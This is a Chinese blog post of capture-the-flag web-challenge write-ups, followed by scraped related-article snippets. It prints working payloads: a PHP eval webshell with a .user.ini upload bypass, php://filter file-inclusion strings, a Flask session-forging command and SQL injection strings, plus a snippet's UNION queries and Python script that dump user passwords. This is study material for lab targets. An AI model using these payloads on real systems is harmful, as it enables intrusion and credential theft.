web安全初阶2

最新推荐文章于 2024-02-27 20:17:39 发布
最新推荐文章于 2024-02-27 20:17:39 发布
阅读量513 收藏 2
点赞数 1
CC 4.0 BY-SA版权
分类专栏: 安全 文章标签: web安全 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0_74146042/article/details/130828235
本文详细介绍了几项网络安全挑战赛的任务解决方案,包括通过添加robots.txt协议找到隐藏flag,分析JavaScript代码找寻游戏过关秘诀,利用Hackbar工具进行参数构造,session伪造获取权限,以及在攻防世界中利用PHP文件包含漏洞揭示flag。每个问题都涉及了不同的技术手段和安全概念。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

文章目录

简单

Training-WWW-Robots

点开链接发现是一处可点击的地方
在这里插入图片描述但是点击并未有任何变化,在反观题目,发现提到协议robots,自然想到在URL后面加协议robots.txt
在这里插入图片描述
得到扩展名
在这里插入图片描述
输入到原来的URL
在这里插入图片描述
得到flag
flag

cyberpeace{84fa8868e87d2b5fb4173a184f8b35e9}

nssctf

1.[LitCTF 2023]导弹迷踪

在这里插入图片描述
首先拿到这题,猜想是作者想让我们从底层代码找到当分数能通过第6关时的情况(总不能是玩到第6关通过吧,答辩根本过不去)。查看源代码,找信息,发现代码块。(ps:.js结尾的都能点击进去查看)

在这里插入图片描述
那么这么多,按照代码书写的风格,gama.js一般是实现游戏逻辑的代码,所以可以在这里面找到flag
在这里插入图片描述
提交时注意按要求

NSSCTF{y0u_w1n_th1s_!!!}

2.Follow me and hack me

观察提示,Hackbar直接写出。

在这里插入图片描述
操作如下:
在这里插入图片描述

3.作业管理系统

在后台找到账户密码为admin,admin.创建文件。
在这里插入图片描述
上传一句话木马
在这里插入图片描述进行访问后。

上传后让A=system(“cat /f*”);
在这里插入图片描述在这里插入图片描述

4.Flag点击就送

F12查看是session。
在这里插入图片描述

运行session伪造的脚本 python flask_session_cookie_manager3.py encode -s ‘LitCTF’ -t ‘{ “name”: “admin” }’,得到伪造的session值。把伪造好的session值传上去,即可得到flag

攻防世界

1.fileinclude

编辑Cookie

language=php://filter/read=convert.base64-encode/resource=/var/www/html/flag

在这里插入图片描述选择发送,查看响应
在这里插入图片描述
进行base64解码,得到flag。
在这里插入图片描述

2.file_include

构造payload

?filename=php://filter//convert.iconv.SJIS*.UCS-4*/resource=flag.php

然后就能看到flag
在这里插入图片描述看不懂构造的?请看下图(内容参考多篇博客,侵权可删)
在这里插入图片描述

3.fileclude

构造
在这里插入图片描述

进行base64解码即可。

在这里插入图片描述

4.inget

根据提示构造

?id=1’ or 1=1-- -

在这里插入图片描述

5.easyupload

抓包获取,上传.user.ini,修改它的类型为image/jpg。内容为

GIF89a
auto_prepend_file=a.jpg

上传a.jpg,内容为

GIF89a

<?=eval($_POST['cmd']);?>

上传后,查看文件。
在这里插入图片描述蚁剑连接后,在flag中找到。

【网络安全】AntSword剑新手快速入门(附实战案例)
等风来
04-27 9814
剑(AntSword)是一款开源的跨平台WebShell管理工具,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。剑的特点主要有如下几点:1.支持多平台。包括macOS、Linux 32位、Linux 64位、Linux armv7l、Linux arm64、Windows 32位、Windows 64位。2.完善的文档。中国剑文档地址。3.多项功能。文件管理功能、虚拟终端功能、数据库管理功能。4.内置代理功能。
[LitCTF 2023]WEB刷题记录
m0_73239569的博客
11-21 208
看到题目描述,已经给了我们提示了。(Flag位于根目录)我们直接写一下payload,cat一下flag就可以了。然后run code。启动环境,非常帅的页面。根据题目描述,通过6关得到flag,但是没有拿到。开启环境,看到这个页面,功能还是挺好用的。F12查看源码,网页代码里面依然没有找到。开启环境,直接F12,查看源码就可以。
中国剑安装和使用教程(GOOD)
weixin_74245209的博客
11-30 2332
可以看到这是最高权限system相当于Linux中的root。官方加载器:(加载器分为Mac、Windows、Linux)在运行AntSword .exe。里面有一些好用的插件,大家自己去看。剑的大名想必各位都听过今天来安装配置。可以上传,修改或删除。可以右键建个快捷方式。添加webshell地址和密码。2.添加webshell。第一个头单点进入终端。
刷题学习记录
qq_73861475的博客
02-27 1368
看到题目提示要玩过6关才会有flag结果老老实实的玩了6关出现了flag另外还有一种方法就是查看js代码,多数网页游戏形式的flag都可以在js代码中找到,只是花费的时间有点多!!
SZTU_CTF_12.16_wp
qq_48932191的博客
12-22 590
尝试上传php一句话木马,跳js弹窗关闭js再次上传成功剑连接找到flag
Java学习资料 包括Javaee初阶web前端,javascript,线程 Spring全家桶等等这些代码
06-21
Spring MVC是用于构建Web应用的模块,Spring Data简化了数据库操作,而Spring Security则专注于应用安全。 文件名“java-ee_code-master”可能是一个包含JavaEE项目的源码仓库,可能包含了上述各个领域的示例代码,...
DJinn1靶机教程:初阶到中阶的网络安全挑战
2. SSH服务的22端口存在过滤规则,可能需要绕过。 3. 1337端口运行着一个游戏应用。 4. 7331端口与Python Web服务有关。 **1337端口测试** 1337端口上运行的是一个简单的计算器游戏。通过使用`nc -vv 192.168.0.177...
Python学习路线图_pro 初阶中阶高阶
06-06
学习Web框架如Django和Flask的使用,包括它们的安装配置、路由定义、请求响应处理、数据库操作、表单处理、模板语言(如Django的DTL)以及部署、日志和安全性。对于高性能Web应用,可以学习Tornado,了解其异步Web...
Java学习的资料(内含初阶+进阶+项目(spring,springboot等))
04-17
2. **面向对象编程**:理解面向对象的基本概念,如类、对象、接口、抽象类,以及设计模式的应用,如单例模式、工厂模式、观察者模式等。 3. **Spring框架**:Spring框架的核心包括依赖注入(DI)、AOP(面向切面...
融云Demo初阶连上聊天服务器
04-19
在融云开发者中心,你可以找到适用于不同平台(如Android、iOS、Web等)的SDK。根据你的项目需求,选择相应的SDK下载并导入到你的开发环境中。 3. **初始化融云SDK** 在你的应用程序启动时,需要进行融云SDK的...
BUUCTF刷题十一道(09)
qq_45837896的博客
09-26 625
剑连接无法查看flag,发现是有disable_functions限制,使用剑绕过disable_functions插件。session可控,修改session,长度为32位,session后缀改为.php(加上.php后为32位)这个可以开burp扫一下,或者用dirsearch扫一下,一些url会自动跳转index.php。变量,POST优先级高于$_GET,所以这里POST传GET相应变量没字母的。解析字符串时不会进行url解码,所以可以用url编码绕过,而。
DC-5 靶场学习
akxnxbshai的博客
03-03 798
DC-5靶场学习。
LitCTF-web方向
konpure的博客
12-24 507
接下来用脚本对admin进行伪造,密钥猜测为"LitCTF"(看wp知道的,也可以用脚本对密钥进行爆破,不过没有任何已知条件的情况下,六位的密钥爆破完不知道要花多久)CTF=Lit2023后跳转,然后用bp抓包,用post方式提交Challenge=i’m_c0m1ng,得到flag(使用hackbar更加方便,但我的hackbar还在因不明原因无法正常使用)根据该语句尝试拼接并开始爆库,爆表,爆列,爆值,一路爆下去,得到flag。于是根据该代码用bp抓包并构造语句,以post的方式上传,得到flag
Litctf web复现
qq_74193776的博客
05-25 312
LitCTF web复现
ISCC 2023 练武题 web 所有题目
m0_64425190的博客
06-03 1万+
ChatGGG ISCC内部零元购-2 ISCC单身节抽奖 ISCC疯狂购物节-1 Where_is_your_love 上大号说话 小周的密码锁 羊了个羊 老狼老狼几点了
LitCTF 2023-WEB部分wp
m0_74606212的博客
10-12 269
LitCTF 2023-WEB部分wp
攻防世界webweb shell关卡使用中国
Lu__xiao的博客
11-30 1014
访问web shell关卡进入此网站,得到下面一句话 打开剑,右击空白,添加数据 URL 填写网站地址 密码shell 点击添加 连接后在网站目录下可以看到 flag.txt文件 里面放置flag index.php文件 里面放置网站源代码 源代码 flag:cyberpeace{7d9b52e47e2e775606e7c143f55b398c} webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种...
webshell工具——剑】剑安装使用教程
SUSUYUA的博客
02-06 1万+
本篇内容主要为webshell工具剑的安装以及使用,本人也通过查询较多的文章,进行了总结,由于是第一次接触,有些地方可能存在问题,欢迎评论区留言。
文件的读写基本操作
热门推荐
范高伦的博客
09-07 1万+
一、文件是计算机中数据持久化存储的表现形式 读写文件标准操作格式1: 1、打开文件:file1 = open('文件名','读写模式') 2、操作文件 3、关闭文件:file1.close() 文件操作完毕后必须关闭,否则长期保持对文件的连接状态,造成内存溢出的现象发生 读写文件操作格式2: # 1、打开文件 file1 = open('demo.txt','w') # 2、操作文件 file1.write('hello world') # 3、关闭文件 file1.close() 1、打开文件:wi
头歌sql注入初阶
最新发布
06-17
### 头歌 SQL 注入 初阶教程 实验 SQL注入是一种常见的安全漏洞,攻击者通过在输入字段中插入恶意的SQL代码来操控数据库查询。以下是基于头歌平台的初阶SQL注入实验的详细说明和方法。 #### 1. 环境搭建 为了进行SQL注入实验,首先需要搭建一个支持SQL注入测试的环境。通常使用DVWA(Damn Vulnerable Web Application)作为测试平台[^2]。 - 安装Apache、PHP、MySQL等服务。 - 配置Web服务器并安装DVWA应用。 ```bash sudo apt-get update sudo apt-get install apache2 php mysql-server libapache2-mod-php sudo service apache2 start sudo service mysql start ``` #### 2. 获取数据库名称、账户名、版本及操作系统信息 通过SQL注入可以获取数据库的基本信息。例如,在`id`参数中输入以下payload: ```sql 1' AND 1=2 UNION SELECT user(), database() # ``` 这将返回当前数据库用户名和数据库名称。例如:`root@localhost` 和 `dvwa`[^2]。 #### 3. 获取数据库表名 利用`information_schema.tables`表可以列出当前数据库中的所有表名。构造如下payload: ```sql 1' UNION SELECT 1, group_concat(table_name) FROM information_schema.tables WHERE table_schema = database() # ``` 执行后会返回数据库中的表名,如`guestbook, users`[^5]。 #### 4. 获取数据库列名 在获取表名后,可以通过`information_schema.columns`表进一步获取指定表的列名。例如,获取`users`表的列名: ```sql 1' UNION SELECT 1, group_concat(column_name) FROM information_schema.columns WHERE table_name = 0x7573657273 # ``` 这里使用了十六进制编码`0x7573657273`表示`users`表名[^5]。 #### 5. 获取敏感数据 最终目标是获取敏感数据,如用户名和密码。假设已知`users`表包含`username`和`password`字段,可以构造如下payload: ```sql 1' UNION SELECT username, password FROM users # ``` 这将返回用户列表及其密码哈希值。 #### 6. 注意事项 - 某些网站可能对特殊字符进行过滤或转义,例如将`#`替换为`\#`。这种情况下,可以尝试其他注释符(如`-- -`或`/* */`)[^3]。 - 如果直接注入失败,可以考虑利用存储型注入,即先将恶意代码存入数据库,再通过其他页面触发。 ```python import requests url = "http://example.com/vulnerable-page" payload = "1' UNION SELECT username, password FROM users -- -" response = requests.get(url, params={"id": payload}) print(response.text) ```
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

温有情

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值